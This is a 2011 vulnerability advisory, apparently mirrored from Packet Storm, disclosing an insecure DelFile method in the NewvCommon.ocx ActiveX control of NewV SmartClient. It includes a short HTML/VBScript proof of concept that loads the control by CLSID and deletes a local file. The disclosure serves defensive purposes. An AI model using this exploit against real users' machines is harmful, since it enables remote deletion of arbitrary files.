Lucene search
K

NewvCommon.ocx Active-X Insecure Method

🗓️ 10 Jan 2011 00:00:00Reported by Shennan WangType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

NewvCommon.ocx ActiveX Insecure Method Vulnerability in All Version

Code
`NewvCommon.ocx ActiveX Insecure Method Vulnerability  
========  
Vulnerable:All Version  
Vendor:www.newv.com.cn  
  
  
Details:  
========  
A Insecure method vulnerability has been found in NewV SmartClient.   
The specific flaw exists within the DelFile method of the Newv ActiveX control (NewvCommon.ocx).  
The DelFile method does not handle user's input exactly that can be used to delete arbitrary files on users system.  
  
  
POC:   
========  
Function DelFile (  
ByVal FilePath As Variant   
) As String  
  
  
<html>  
<head>  
<script language='vbscript'>  
arg1 = "c:\\test.txt"  
</script>  
</head>  
<object classid='clsid:0B68B7EB-02FF-4A41-BC14-3C303BB853F9' id='target' />  
</object>  
<script language='vbscript'>  
target.DelFile arg1   
</script>  
</html>  
  
  
Timeline:  
========  
2010.10.23 Report to vendor,no response.  
2011.01.10 Public  
  
  
  
Reference:  
========  
http://www.newv.com.cn  
http://demo.newv.com.cn/lds/module/smartclientsetting.exe  
http://www.nansec.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation